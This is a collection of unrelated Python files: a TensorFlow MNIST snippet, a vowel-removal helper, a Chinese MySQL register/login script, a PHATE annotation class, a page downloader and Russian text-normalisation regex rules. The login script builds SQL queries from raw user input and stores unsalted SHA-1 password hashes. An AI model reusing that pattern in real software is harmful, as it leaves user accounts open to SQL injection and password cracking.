model.add(Dense(10, kernel_initializer='he_normal'))
return model
def cross_entropy(model_output, label_batch):
loss = tf.reduce_mean(
-tf.reduce_sum(label_batch * tf.log(model_output),
reduction_indices=[1]))
return loss
if __name__ == '__main__':
data = input_data.read_data_sets("/media/trans/mnt/data/MNIST/", one_hot=True)
print type(data)
print type(data.train.images)
# exit(0)
# (x_train, y_train), (x_test, y_test) = mnist.load_data()
# In Docs , should be tensors generally, but numpy type works.
train_ds = tf.data.Dataset.from_tensor_slices((data.train.images, data.train.labels)) \
.map(lambda x, y: (x, tf.cast(y, tf.float32))) \
.shuffle(buffer_size=1000) \
.batch(100)
model = build_model()
optimizer = tf.train.GradientDescentOptimizer(0.5)
for step, (image_batch, label_batch) in enumerate(tfe.Iterator(train_ds)):
exit(0)
with tf.GradientTape() as tape:
image_batch = tf.reshape(image_batch, (100,28,28,1))
output = model(image_batch)
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=output, labels=label_batch))
gradients = tape.gradient(loss, model.variables)
optimizer.apply_gradients(zip(gradients, model.variables))
print("step: {} loss: {}".format(step, loss.numpy()))
# model_test_output = model(data.test.images)
# model_test_label = data.test.labels
# correct_prediction = tf.equal(tf.argmax(model_test_output, 1), tf.argmax(model_test_label, 1))
# accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# print("test accuracy = {}".format(accuracy.numpy()))
|
# eatvowels.py
def eat_vowels(s):
""" Removes the vowels from s.
>>> eat_vowels('Apple Sauce')
'ppl Sc'
"""
return ''.join([c for c in s if c.lower() not in 'aeiou'])
|
from mysqlhelper import MysqlHelper
from hashlib import sha1
from getpass import getpass
import string
mysql=MysqlHelper('db5')
#给字符串进行加密
def update_pwd(passwd):
s=sha1()
s.update(passwd.encode())
passwd=s.hexdigest()
return passwd
#注册函数
def register():
while True:
#接收用户名
username=input('请输入用户名:')
#依次把用户名中的每个字符遍历出来做判断
all_chars=string.punctuation+string.whitespace
for i in username:
if i in all_chars:
print('用户名中不能包含特殊字符')
break
#使用标志位也行
else:
break
sel='select username from user where username="%s"'%username
r=mysql.get_all(sel)
if r:
print('用户名已存在')
return
else:
#用户名可用接受用户输入密码
passwd=getpass('请输入密码:')
#查询用户是否已存在
re_passwd=getpass('请再次输入密码:')
if passwd==re_passwd:
#把用户信息存放到user表,并提示注册成功
#加密
re_passwd=update_pwd(re_passwd)
# s=sha1()
# s.update(re_passwd.encode())
# re_passwd=s.hexdigest()
ins='insert into user values ("%s","%s")'%(username,re_passwd)
mysql.execute_sql(ins)
print('注册成功')
else:
print('密码输入不一致')
return
#登录函数
def loign():
while True:
username=input('请输入用户名:')
if username=='':
print('退出登录')
passwd=getpass('请输入密码:')
sel='select passwd from user where username="%s"'%username
r=mysql.get_all(sel)
if r:
passwd=update_pwd(passwd)
# s=sha1()
# s.update(passwd.encode())
# passwd=s.hexdigest()
# print(passwd)
# print(r[0])
#fetchall函数的返回值是元祖里面包含元祖
if passwd==r[0][0]:
print('登录成功')
return
else:
print('密码输入错误,请重新输入')
else:
print('用户名不存在')
#
if __name__=='__main__':
while True:
menu='''
(1)注册
(2)登录
(3)退出
请选择(1/2/q):'''
choice=input(menu)
if choice.strip() in ['1','2','q']:
if choice=='1':
print('进行注册中...')
register()
elif choice=='2':
print('进行登录中...')
loign()
break
else:
print('退出菜单')
break
|
import numpy
print("add two numbers")
a=numpy.array([2,3,4])
b=numpy.array([3,2,5])
print("Sum of {} and {} is {}".format(a,b,a+b))
|
###########################################################
# Module: phate_annotation.py
# Programmer: Carol L. Ecale Zhou
#
# Data of last update: October 2016 - code being modified from CGP code base
# 03 January 2017 - modified output report in method printAnnotationRecord()
# 05 January 2017 - adding code to pull dbxrefs from local database instances
# 17 July 2018 - adapted for use in building pVOGs fasta database
#
# Module containing classes and methods for representing annotation results from various sources
# Classes and methods:
# annotationRecord
# enterGFFdata(gff/dict)
# printAnnotationRecord
# printAnnotationRecord2file
# printAll
# printAll2file(fileH)
#########################################################
# This code was developed by Carol L. Ecale Zhou at Lawrence Livermore National Laboratory.
# THIS CODE IS COVERED BY THE BSD LICENSE. SEE INCLUDED FILE BSD.pdf FOR DETAILS
import re
import os
import subprocess
CHATTY = True
DEBUG = False
p_comment = re.compile('^#')
class annotationRecord(object):
def __init__(self):
self.source = "unknown" # Typically RAST, LLNL, PhAnToMe, GeneMark, Glimmer, Prodigal, PHATE, KEGG, NCBI
self.method = "unknown" # Typcially RAST, PSAT, PFP, PhiRAST, JGI, SDSU, Blast, blastp, blastn
self.annotationType = "unknown" # gene, mRNA, polypeptide, CDS, functional, homology
self.contig = "unknown"
self.start = 0
self.end = 0
self.strand = 'x'
self.readingFrame = 'x'
self.identifier = "none"
self.locusTag = "none"
self.name = "none" # subject hit header (i.e., database identifier provider in fasta header)
self.description = "none" # more information: dbxref identifiers provided via lookup-tables (see above)
self.annotationList = [] # could be multiple from single source
self.category = "none" # functional categories: primary, sequence, structure, motif, etc.
self.wraparound = "none" # indicates that a gene call wraps around the genome sequence as given
self.psat = {
"jobID" : "", # PSAT job id
"jobName" : "", # PSAT job name
"fileName" : "", # PSAT output file
}
self.psatOutDir = "" # need to set
def enterGFFdata(self,gff): # Input a dict object with key/values as specified
if isinstance(gff,dict):
self.source = gff["source"]
self.method = gff["method"]
self.annotationType = gff["type"]
self.contig = gff["contig"]
self.start = gff["start"]
self.end = gff["end"]
self.strand = gff["strand"]
self.readingFrame = gff["readingFrame"]
annotList = gff["annotation"].split(';')
for annot in annotList:
self.annotationList.append(annot)
self.category = "sequence"
return True
else:
return False
def removeRedundancy(self,inList): # Eliminate redundancy in list; Different PSAT annotations sources can return same annotation
outList = []
for i in xrange(len(inList)):
item = inList.pop()
if item not in inList:
outList.append(item)
outList.reverse()
return outList
# PRINT METHODS
def printAnnotationRecord(self):
print "Annotation source:", self.source, '| Method:', self.method, '| Type:', self.annotationType
print "Contig:", self.contig, "| Start:", self.start, "| End:", self.end, "| Strand:", self.strand
print "Name:", self.name, "Description:", self.description
print "Annotations:", self.annotationList
def printAnnotationRecord_tabHeader(self):
header = 'Source\tMethod\tType\tCategory\tStart-End/strand\tName\tDescription'
print header
def printAnnotationRecord_tab(self):
annotationString = ""
#print "Number of annotations:", len(self.annotationList)
for annot in self.annotationList:
annotationString += annot
annotationString += ' | '
tabLine = self.source + '\t' + self.method + '\t' + self.annotationType + '\t' + self.category + '\t'
tabLine += str(self.start) + '-' + str(self.end) + '/' + self.strand + '\t'
tabLine += self.name + '\t' + self.description + '\t' + annotationString
print tabLine
def printAnnotationRecord2file_tabHeader(self,FILE_HANDLE):
header = 'Source\tMethod\tType\tCategory\tStart-End/strand\tName\tDescription'
FILE_HANDLE.write("%s\n" % (header))
def printAnnotationRecord2file_tab(self,FILE_HANDLE):
annotationString = ""
for annot in self.annotationList:
annotationString += annot
annotationString += ' | '
tabLine = self.source + '\t' + self.method + '\t' + self.annotationType + '\t' + self.category + '\t'
tabLine += str(self.start) + '-' + str(self.end) + '/' + self.strand + '\t'
tabLine += self.name + '\t' + self.description + '\t' + annotationString
FILE_HANDLE.write("%s\n" % (tabLine))
def printAnnotationRecord2file(self,FILE_HANDLE): #*** Update this
FILE_HANDLE.write("%s%s%s" % ("Annotation source:",self.source,"\n"))
FILE_HANDLE.write("%s%s%s" % ("Method:",self.method,"\n"))
FILE_HANDLE.write("%s%s%s" % ("Contig:",self.contig,"\n"))
FILE_HANDLE.write("%s%s%s" % ("Annotations:",self.annotationList,"\n"))
def printAll(self):
print "=== Annotation record ==="
print "Source:", self.source
print "Method:", self.method
print "Type:", self.annotationType
print "Contig:", self.contig
print "Start:", self.start
print "End:", self.end
print "Strand:", self.strand
print "Reading Frame:", self.readingFrame
print "Identifier:", self.identifier
print "Locus Tag:", self.locusTag
print "Name:", self.name
print "Description:", self.description
print "Category:", self.category
print "Wraparound:", self.wraparound
print "Annotation List:"
for annot in self.annotationList:
print " ", annot
print "Category:", self.category
print "========================"
def printAll2file(self,FILE_HANDLE):
FILE_HANDLE.write("%s" % ("Annotation record ===\n"))
FILE_HANDLE.write("%s%s%s" % ("Source:",self.source,"\n"))
FILE_HANDLE.write("%s%s%s" % ("Method:",self.method,"\n"))
FILE_HANDLE.write("%s%s%s" % ("Type:",self.annotationType,"\n"))
FILE_HANDLE.write("%s%s%s" % ("Contig:",self.contig,"\n"))
FILE_HANDLE.write("%s%s%s" % ("Start:",self.start,"\n"))
FILE_HANDLE.write("%s%s%s" % ("End:",self.end,"\n"))
FILE_HANDLE.write("%s%s%s" % ("Strand:",self.strand,"\n"))
FILE_HANDLE.write("%s%s%s" % ("Reading Frame:",self.readingFrame,"\n"))
FILE_HANDLE.write("%s%s%s" % ("Identifier:",self.identifier,"\n"))
FILE_HANDLE.write("%s%s%s" % ("Locus Tag:",self.locusTag,"\n"))
FILE_HANDLE.write("%s%s%s" % ("Name:",self.name,"\n"))
FILE_HANDLE.write("%s%s%s" % ("Description:",self.description,"\n"))
FILE_HANDLE.write("%s%s%s" % ("Category:",self.category,"\n"))
FILE_HANDLE.write("%s%s%s" % ("Wraparound:",self.wraparound,"\n"))
FILE_HANDLE.write("%s" % ("Annotation List:i\n"))
for annot in self.annotationList:
FILE_HANDLE.write("%s%s%s" % (" ",annot,"\n"))
FILE_HANDLE.write("%s" % ("Paralog List:\n"))
for paralog in self.paralogList:
FILE_HANDLE.write("%s%s%s" % (" ",paralog,"\n"))
FILE_HANDLE.write("%s" % ("=======================\n"))
|
import requests # pip install requests
from bs4 import BeautifulSoup # pip install beautifulsoup4
import urllib.request
from urllib.error import HTTPError
from urllib.error import URLError
import http.client
from socket import timeout
from requests.exceptions import ConnectionError
import json, sys
def descargarResultadoData(URL, TIMEOUT, INTENTS, DATA, HEADERS):
tries=0;
pagina='';
if not URL:
return '';
while tries<11:
try:
req = urllib.request.Request( URL);
response = urllib.request.urlopen(req, timeout=TIMEOUT)
html = response.read().decode('utf-8')
pagina = BeautifulSoup(html, 'html.parser');
tries = 12;
except KeyboardInterrupt:
print('The user abort the script.')
sys.exit()
except HTTPError:
# print('No hay mas links.')
tries = 12;
return pagina
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# В этом файле определены правила.
from re import finditer, sub
from .templates import (units, zh_units,
forms,
pre_acc, pre_units,
r_ca, d_ca, v_ca, t_ca, p_ca,
adj_pad, mn_pad, mu_pad, sr_pad, zh_pad)
from .functions import (condition, cardinal, ordinal, roman2arabic, replace,
substant, feminin, daynight, decimal)
from .words_forms import Words, M_GENDER, Z_GENDER, S_GENDER
# Для определения атрибутов слов
words = Words()
class RuleBase():
"""
Базовый класс.
"""
def __init__(self):
self.mask = '' # регулярное выражение для поиска (маска)
def run(self, text, debug=False):
"""
Применение правила к тексту.
"""
length = len(text)
for m in finditer(self.mask, text):
new = self.check(m)
if new is not None:
text = replace(text, new, length, m.start(), m.end())
if debug:
print('Сработало правило: %s' % self.__class__.__name__)
print(' найдено: "%s"\n'
' заменено: "%s"\n' % (m, new))
return text
def check(self, m):
"""
Проверка и обработка найденных совпадений по маске.
Должна возвращать строку для замены найденной или None.
"""
pass
class QuasiRoman(RuleBase):
"""
Описание: Часто вместо латиницы встречается кириллица.
Пример:
"""
def __init__(self):
self.mask = (r'\b(([ІVХIX]+( [-и] | или | [дп]о )'
r'(начал[аеоу] |конец |конц[аеу] |середин[аеуы] |'
r'началом |концом |серединой |)|)'
r'[ІVХIX]+ )(век[аеу]?|веках|веками?|веков|'
r'(сто|тысяче)лети(ем?|й|ю|ях?|ями?))\b')
def check(self, m):
if 'Х' in m.group(1) or 'І' in m.group(1):
new = m.group(1)
new = sub('І', 'I', new)
new = sub('Х', 'X', new)
return new + m.group(5)
else:
return None
class UnitRule_1(RuleBase):
"""
Описание: Единицы измерения. Винительный падеж.
Пример:
"""
def __init__(self):
self.mask = (
r'\b(([Зз]а|[Нн]а|[Пп]ро|[Сс]пустя|[Чч]ерез|'
r'состав[авеийлотшщьюя]{2,6}|превы[сш][авеийлотшщьюя]{2,5}) (бы |)'
r'((\d+,|)(\d+) - |)(\d+,|)(\d+)) ' + units)
def check(self, m):
new = m.group(1) + ' '
if m.group(7):
new += forms[m.group(9)][2]
else:
new += substant(m.group(8), m.group(9), 5)
return new
class UnitRule_2(RuleBase):
"""
Описание: Единицы измерения. Винительный падеж.
Пример: "диаметром в 2 см -> диаметром в 2 сантиметра"
"""
def __init__(self):
self.mask = (
r'\b([А-Яа-яё]{3,})'
r'( (всего |ориентировочно |примерно |приблизительно |более чем |'
r'не более чем |стрельбы |пол[её]та |пуска |)в '
r'((\d+,|)(\d+) - |)(\d+,|)(\d+)) ' + units)
def check(self, m):
preacc = sub('ё', 'е', m.group(1).lower())
if preacc in pre_acc and (m.group(9) in pre_units or m.group(9) in
('тыс.', 'млн', 'млрд')):
new = m.group(1) + m.group(2) + ' '
if m.group(7):
new += forms[m.group(9)][2]
else:
new += substant(m.group(8), m.group(9), 5)
return new
else:
return None
class UnitRule_13(RuleBase):
"""
Описание: Сокращенные обозначения колич. числительных. Предложный падеж.
Пример: "в 1 тыс. км -> в 1 тысяче км"
"""
def __init__(self):
self.mask = (
r'\b([Вв] )((\d+,|)(\d+)( [-и] | или )|)'
r'(\d+,|)(\d+) (тыс\.|млн|млрд|трлн) ' + units)
def check(self, m):
if m.group(9) in pre_units:
new = m.group(1)
if m.group(2):
if m.group(3):
new += decimal(m.group(3)[:-1], m.group(4), 4)
else:
if m.group(8) == 'тыс.':
new += feminin(cardinal(m.group(4), p_ca), 4)
else:
new += cardinal(m.group(4), p_ca)
new += m.group(5)
if m.group(6):
new += decimal(m.group(6)[:-1], m.group(7), 4) + ' '
new += forms[m.group(8)][2]
else:
new += m.group(7) + ' ' + substant(m.group(7), m.group(8), 4)
return new + ' ' + m.group(9)
else:
return None
class UnitRule_14(RuleBase):
"""
Описание: Единицы измерения. Дательный/винительный падеж.
Пример:
"""
def __init__(self):
self.mask = (
r'\b([Вв] ((\d+,|)\d+ - |)(\d+,|)(\d+) )' + units)
def check(self, m):
new = m.group(1)
if m.group(4):
new += forms[m.group(6)][2]
else:
if m.group(6) in pre_units:
new += substant(m.group(5), m.group(6), 4)
else:
new += substant(m.group(5), m.group(6), 5)
return new
class UnitRule_15(RuleBase):
"""
Описание: Единицы измерения расстояния с предлогом "с". Родительный падеж.
Пример: "с 5 км -> с 5 километров"
"""
def __init__(self):
self.mask = (
r'\b([Сс] (\d+ - |)(\d+) )((тыс\.) |)(к?м)')
def check(self, m):
new = m.group(1)
if m.group(4):
new += substant(m.group(3), m.group(5), 1) + ' ' + m.group(6)
else:
new += substant(m.group(3), m.group(6), 1)
return new
class UnitRule_10(RuleBase):
"""
Описание: Сокращенные обозначения колич. числительных. Предложный падеж.
Пример: "в 1 тыс. километров -> в 1 тысяче километров"
"""
def __init__(self):
self.mask = (
r'\b([Вв] )((\d+,|)(\d+)( [-и] | или )|)'
r'(\d+,|)(\d+) (тыс\.|млн|млрд|трлн) '
r'(километров|(морских |)миль|парсек(ов|)|световых лет)\b')
def check(self, m):
new = m.group(1)
if m.group(2):
if m.group(3):
new += decimal(m.group(3)[:-1], m.group(4), 4)
else:
if m.group(8) == 'тыс.':
new += feminin(cardinal(m.group(4), p_ca), 4)
else:
new += cardinal(m.group(4), p_ca)
new += m.group(5)
if m.group(6):
new += decimal(m.group(6)[:-1], m.group(7), 4) + ' '
new += forms[m.group(8)][2]
else:
new += m.group(7) + ' ' + substant(m.group(7), m.group(8), 4)
return new + ' ' + m.group(9)
class UnitRule_3(RuleBase):
"""
Описание: Единицы измерения. Родительный падеж.
Пример: "от 1 до 4 км -> от 1 до 4 километров"
"""
def __init__(self):
self.mask = (r'\b([Оо]т |[Сс]о? )(((\d+,|)\d+ - |)(\d+,|)\d+ '
r'до ((\d+,|)\d+ - |)(\d+,|)(\d+) )' + units)
def check(self, m):
if m.group(8):
new = forms[m.group(10)][2]
else:
new = substant(m.group(9), m.group(10), 1)
return m.group(1) + m.group(2) + new
class UnitRule_4(RuleBase):
"""
Описание: Единицы измерения. Родительный падеж.
Пример:
"""
def __init__(self):
self.mask = (
r'\b('
r'[Бб]олее|[Мм]енее|[Бб]ольше|[Мм]еньше|[Вв]ыше|[Нн]иже|[Дд]альше|'
r'[Оо]коло|[Сс]выше|[Дд]ля|[Дд]о|[Ии]з|[Оо]т|[Вв]место|[Дд]линнее|'
r'[Вв] размере|[Бб]лиже|[Вв] течение|[Вв] количестве|[Вв] пределах|'
r'[Дд]ости[гчаетья]{1,4}|[Дд]остига?л[аио]?|[Дд]остигн[еу]т|'
r'[Дд]остигши[еймх]|[Дд]остигавши[еймх]|[Дд]остигш[аеигмоуя]{2,3}|'
r'[Дд]остигавш[аеигмоуя]{2,3}|[Дд]остигше[ейм|[Дд]остигавше[ейм]|'
r'[Вв]ладел[аеимухцыь]{2,5}|[Пп]ротив|[Пп]орядка|[Пп]осле|'
r'[Нн]а уровне|[Ээ]тих [а-яё]+[иы]х|[Ээ]тих|[Рр]анее|'
r'[Нн]е превы[сш][аи][авеийолтшщюья]{1,4}'
r')'
r'( приблизительно | примерно | почти | более чем | менее чем '
r'| плюс | минус | максимум | минимум | )'
r'((\d+,|)(\d+)( - | или | и )'
r'(плюс |минус |)|)(\d+,|)(\d+) ' + units)
def check(self, m):
if m.group(3):
if m.group(4):
prenum = decimal(m.group(4)[:-1], m.group(5), 1)
else:
prenum = cardinal(m.group(5), r_ca)
if condition(m.group(5)) and m.group(10) in zh_units:
prenum = prenum[:-2] + 'й'
prenum += m.group(6) + m.group(7)
else:
prenum = ''
if m.group(8):
number = decimal(m.group(8)[:-1], m.group(9), 1)
number += ' ' + forms[m.group(10)][2]
else:
number = cardinal(m.group(9), r_ca)
if condition(m.group(9)) and m.group(10) in zh_units:
number = number[:-2] + 'й'
number += ' ' + substant(m.group(9), m.group(10), 1)
return m.group(1) + m.group(2) + prenum + number
class UnitRule_5(RuleBase):
"""
Описание: Единицы измерения. Родительный падеж.
Пример: "С 10 кВт до 12 -> С десяти киловатт до двенадцати"
"""
def __init__(self):
self.mask = (
r'\b(([Оо]т|[Сс]) '
r'(почти |примерно |приблизительно |плюс |минус |'
r'более чем |менее чем|))'
r'((\d+,|)(\d+) - |)(\d+,|)(\d+) '
r'([%°\℃ВКМ£₽\$\.²³_БВГМагдеклмнпрстцш\']+)'
r'( (в час |в секунду |[а-яё]{3,} |)до '
r'(почти |примерно |приблизительно |плюс |минус |'
r'более чем |менее чем|))(((\d+,|)(\d+) - |)(\d+,|)(\d+)|)\b')
def check(self, m):
if m.group(9) in ('%', '°', "'", '℃', 'В', 'К', 'М', '£', '₽', '$',
'кГц', 'МГц', 'ГГц', 'Гц', 'кпк', 'Мпк', 'Гпк', 'пк',
'кг', 'мг', '_г', 'мкм', 'км', 'см', 'мм', 'м',
'км²', 'см²', 'мм²', 'м²', 'км³', 'см³', 'мм³', 'м³',
'кт', 'Мт', 'т', 'кВт', 'МВт', 'ГВт', 'Вт', 'га', 'л',
'дБ', 'сек', 'л.с.', 'а.е.', 'шт.', 'ед.', 'тыс.',
'млн', 'млрд', 'трлн', 'атм'):
number1 = ''
if m.group(4):
if m.group(5):
number1 = decimal(m.group(5)[:-1], m.group(6), 1)
else:
number1 = cardinal(m.group(6), r_ca)
if m.group(9) in zh_units and condition(m.group(6)):
number1 = number1[:-2] + 'й'
number1 += ' - '
else:
number1 = ''
if m.group(7):
number1 += decimal(m.group(7)[:-1], m.group(8), 1)
number1 += ' ' + forms[m.group(9)][2]
else:
number1 += cardinal(m.group(8), r_ca)
if m.group(9) in zh_units and condition(m.group(8)):
number1 = number1[:-2] + 'й'
number1 += ' ' + substant(m.group(8), m.group(9), 1)
if m.group(13):
if m.group(14):
if (not m.group(15) and m.group(9) in zh_units
and condition(m.group(16))):
number2 = cardinal(m.group(16), r_ca)[:-2] + 'й'
number2 += ' - '
else:
number2 = m.group(14)
else:
number2 = ''
if m.group(17):
number2 += decimal(m.group(17)[:-1], m.group(18), 1)
else:
number2 += cardinal(m.group(18), r_ca)
if m.group(9) in zh_units and condition(m.group(18)):
number2 = number2[:-2] + 'й'
else:
number2 = ''
return m.group(1) + number1 + m.group(10) + number2
else:
return None
class UnitRule_6(RuleBase):
"""
Описание: Единицы измерения. Дательный падеж.
Пример:
"""
def __init__(self):
self.mask = (
r'\b(([Кк]|равная?|равн[оы][ей]?|равен'
r'|равняться|равнял[аио]сь|равнялся|равняется|эквивалент[аеноы]{2})'
r'( всего | почти | примерно | приблизительно | плюс | минус | )'
r')'
r'(\d+,|)(\d+) ' + units)
def check(self, m):
if m.group(4):
number = decimal(m.group(4)[:-1], m.group(5), 2)
number += ' ' + forms[m.group(6)][2]
else:
number = m.group(5) + ' ' + substant(m.group(5), m.group(6), 2)
return m.group(1) + number
class UnitRule_7(RuleBase):
"""
Описание: Единицы измерения. Дательный падеж.
С предлогом "по" при указании количества.
Пример:
"""
def __init__(self):
self.mask = (r'\b([Пп]о (\d*[02-9]1|1(000){0,3})) ' + units)
def check(self, m):
return m.group(1) + ' ' + substant(m.group(2), m.group(4), 2)
class UnitRule_16(RuleBase):
"""
Описание: Единицы измерения. Творительный падеж.
Пример:
"""
def __init__(self):
self.mask = (
r'\b([Мм]ежду (\d+,|)(\d+) [а-я]+ ([а-я]+ |)и )'
r'(\d+,|)(\d+) ' + units)
def check(self, m):
new = m.group(1)
if m.group(5):
new += decimal(m.group(5)[:-1], m.group(6), 3) + ' '
new += forms[m.group(7)][2]
else:
new += m.group(6) + ' ' + substant(m.group(6), m.group(7), 3)
return new
class UnitRule_8(RuleBase):
"""
Описание: Единицы измерения. Творительный падеж.
Пример:
"""
def __init__(self):
self.mask = (
r'\b(([Мм]ежду|[Нн]ад|[Сс]|[Вв]ладе[авеийлмтюшщья]{1,7}|'
r'[Пп]о сравнению со?|[Вв] сравнении со?) '
r'(более чем |почти |приблизительно |примерно |плюс |минус |))'
r'((\d+,|)(\d+)'
r'( [-и] (почти |приблизительно |примерно |плюс |минус |))|)'
r'(\d+,|)(\d+) ' + units)
def check(self, m):
new = m.group(1)
a = m.group(4) and not m.group(5)
if a and condition(m.group(6)) and m.group(11) in zh_units:
new += cardinal(m.group(6), t_ca)[:-2] + 'ой' + m.group(7)
else:
new += m.group(4)
if m.group(9):
new += decimal(m.group(9)[:-1], m.group(10), 3) + ' '
new += forms[m.group(11)][2]
else:
new += m.group(10) + ' ' + substant(m.group(10), m.group(11), 3)
return new
class UnitRule_9(RuleBase):
"""
Описание: Единицы измерения. Предложный падеж.
Пример:
"""
def __init__(self):
self.mask = (
r'\b(([Оо]б?|[Пп]ри) '
r'((около |почти |приблизительно |примерно |плюс |минус |)'
r'(\d+,|)(\d+) ([-и]|или) |)'
r'(около |почти |приблизительно |примерно |плюс |минус |)'
r'(\d+,|)(\d+)) ' + units
)
def check(self, m):
if m.group(9):
pre = forms[m.group(11)][2]
else:
pre = substant(m.group(10), m.group(11), 4)
return m.group(1) + ' ' + pre
class UnitRule_11(RuleBase):
"""
Описание: Единицы измерения. Именительный падеж.
Пример:
"""
def __init__(self):
self.mask = (r'\b(((\d+),|)(\d+)) ' + units)
def check(self, m):
if m.group(2):
return m.group(1) + ' ' + forms[m.group(5)][2]
else:
return m.group(1) + ' ' + substant(m.group(4), m.group(5))
class UnitRule_12(RuleBase):
"""
Описание: Единицы измерения. Именительный падеж.
Пример:
"""
def __init__(self):
self.mask = (
r'('
r'-й степени|тысяч(|ами|а[мх]?|ей?|и|у)|'
r'(миллион|миллиард|триллион)(|ами|а[мх]?|о[вм]|[еу])'
r') ' + units)
def check(self, m):
return m.group(1) + ' ' + forms[m.group(5)][1]
class TimeRule_1(RuleBase):
"""
Описание: Время в формате (h)h ч (m)m мин.
Пример:
"""
def __init__(self):
self.mask = (r'\b([012]?\d) ?ч ?([0-5]?\d) ?мин\b')
def check(self, m):
if condition(m.group(1)):
hours = ' час '
elif m.group(1) in ('2', '3', '4', '02', '03', '04', '22', '23', '24'):
hours = ' часа '
else:
hours = ' часов '
if condition(m.group(2)):
minutes = ' минута'
elif m.group(2) in ('2', '3', '4', '02', '03', '04',
'22', '23', '24', '32', '33', '34',
'42', '43', '44', '52', '53', '54'):
minutes = ' минуты'
else:
minutes = ' минут'
return m.group(1) + hours + feminin(m.group(2)) + minutes
class TimeRule_2(RuleBase):
"""
Описание: Время в формате (ч)ч:мм/(ч)ч.мм
Пример:
"""
def __init__(self):
self.mask = (r'\b(([Вв]|[Нн]а) [012]?\d)[:.]([0-5]\d)\b(?!\.\d)')
def check(self, m):
return m.group(1) + ' ' + feminin(m.group(3), 5) + '_'
class TimeRule_3(RuleBase):
"""
Описание: Время в формате (ч)ч:мм/(ч)ч.мм
Пример:
"""
def __init__(self):
self.mask = (r'\b([Кк] )([012]?\d)[:.]([0-5]\d)\b(?!\.\d)')
def check(self, m):
hours = cardinal(m.group(2), d_ca)
minutes = cardinal(m.group(3), d_ca)
if m.group(3) == '00':
minutes = '00'
else:
if m.group(3)[0] == '0':
minutes = '0_ ' + minutes
minutes = feminin(minutes, 2)
return m.group(1) + hours + ' ' + minutes
class TimeRule_4(RuleBase):
"""
Описание: Время в формате (ч)ч:мм/(ч)ч.мм
Пример:
"""
def __init__(self):
self.mask = (
r'\b([Дд]о |[Пп]осле |[Оо]коло |[Сс] )'
r'([012]?\d)[:.]([0-5]\d)\b(?!\.\d)')
def check(self, m):
hours = cardinal(m.group(2), r_ca)
minutes = cardinal(m.group(3), r_ca)
if m.group(3) == '00':
minutes = '00'
else:
if m.group(3)[0] == '0':
minutes = '0_ ' + minutes
minutes = feminin(minutes, 1)
return m.group(1) + hours + ' ' + minutes
class RomanRule(RuleBase):
"""
Описание: Римские цифры.
Пример:
"""
def __init__(self):
self.mask = (
r'\b([IVX]+)( [-и] )([IVX]+)( век(ами?|ах?|ов|е)'
r'| (тысячелети|столети|поколени)(ями?|ях?|и|й))\b')
def check(self, m):
if m.group(5):
ending = m.group(5)
else:
ending = m.group(7)
if ending == 'а':
num1 = ordinal(roman2arabic(m.group(1)), 'i_mu')
num2 = ordinal(roman2arabic(m.group(3)), 'i_mu')
elif ending == 'я':
num1 = ordinal(roman2arabic(m.group(1)), 'i_sr')
num2 = ordinal(roman2arabic(m.group(3)), 'i_sr')
elif ending == 'ов' or ending == 'й':
num1 = ordinal(roman2arabic(m.group(1)), 'r_mu')
num2 = ordinal(roman2arabic(m.group(3)), 'r_mu')
elif ending == 'ам' or ending == 'ям':
num1 = ordinal(roman2arabic(m.group(1)), 'd_mu')
num2 = ordinal(roman2arabic(m.group(3)), 'd_mu')
elif ending == 'ами' or ending == 'ями':
num1 = ordinal(roman2arabic(m.group(1)), 't_mu')
num2 = ordinal(roman2arabic(m.group(3)), 't_mu')
else:
num1 = ordinal(roman2arabic(m.group(1)), 'p_mu')
num2 = ordinal(roman2arabic(m.group(3)), 'p_mu')
return num1 + m.group(2) + num2 + m.group(4)
class OrdinalRule_1(RuleBase):
"""
Описание: Порядковые числительные.
Пример: "во 2 окне -> во втором окне"
"""
def __init__(self):
self.mask = (
r'\b([Вв]о?|[Нн]а|[Оо]б?|[Пп]ри) '
r'(\d*[02-9]|\d*1\d)(( [а-яё]+[ео][йм]|) ([а-яё]{2,}))\b')
def check(self, m):
attr = words.get_attr(m.group(5))
number = ''
if attr.have([S_GENDER, M_GENDER], False, [5]):
number = ordinal(m.group(2), 'p_mu')
elif attr.have([Z_GENDER], False, [2, 5]):
if len(m.group(2)) == 1 or m.group(2)[-2] != '1':
a = m.group(2)[-1] not in ('2', '3', '4')
b = m.group(1).lower() not in ('в', 'на')
c = attr.have([Z_GENDER], False, [1])
if a or b or not c:
number = ordinal(m.group(2), 'p_zh')
if number:
return m.group(1) + ' ' + number + m.group(3)
return None
class OrdinalRule_2(RuleBase):
"""
Описание: Порядковые числительные.
Пример: "из 3 окна -> из третьего окна"
"""
def __init__(self):
self.mask = (
r'\b([Сс]о?|[Ии]з|[Дд]ля|[Дд]о|[Кк]роме|[Оо]т|[Пп]осле) '
r'(\d*1\d|\d*[02-9]?[02-9]) ([а-яё]+)\b')
def check(self, m):
if m.group(3) not in ('утра', 'дня', 'вечера', 'ночи'):
number = ''
attr = words.get_attr(m.group(3))
if attr.have([M_GENDER, S_GENDER], False, [1]):
number = ordinal(m.group(2), 'r_mu')
elif attr.have([Z_GENDER], False, [1]):
number = ordinal(m.group(2), 'r_zh')
if number:
return m.group(1) + ' ' + number + ' ' + m.group(3)
else:
return None
class OrdinalRule_3(RuleBase):
"""
Описание: Порядковые числительные.
Пример: "со 2 примером -> со вторым примером"
"""
def __init__(self):
self.mask = (r'\b([Сс]о? )(\d*1\d|\d*[02-9]?[02-9]) ([а-яё]+)\b')
def check(self, m):
number = ''
attr = words.get_attr(m.group(3))
if attr.have([M_GENDER, S_GENDER], False, [4]):
number = ordinal(m.group(2), 't_mu')
elif attr.have([Z_GENDER], False, [2, 4, 5]):
number = ordinal(m.group(2), 't_zh')
if number:
return m.group(1) + number + ' ' + m.group(3)
return None
class OrdinalRule_35(RuleBase):
"""
Описание: Порядковые числительные.
Пример: "во 2-й или 3-й комнатах -> во второй или третьей комнатах"
"""
def __init__(self):
self.mask = (
r'\b([Вв]о?|[Нн]а|[Оо]б?|[Пп]ри) '
r'(\d+)-й( или | и )(\d+)-й( ([а-я]+([ео]й|[иы]х) |)([а-яё]+))\b')
def check(self, m):
attr = words.get_attr(m.group(8))
if attr.have([Z_GENDER], None, [5]):
new = m.group(1) + ' ' + ordinal(m.group(2), 'p_zh') + m.group(3)
new += ordinal(m.group(4), 'p_zh') + m.group(5)
return new
return None
class OrdinalRule_36(RuleBase):
"""
Описание: Порядковые числительные. Женский род.
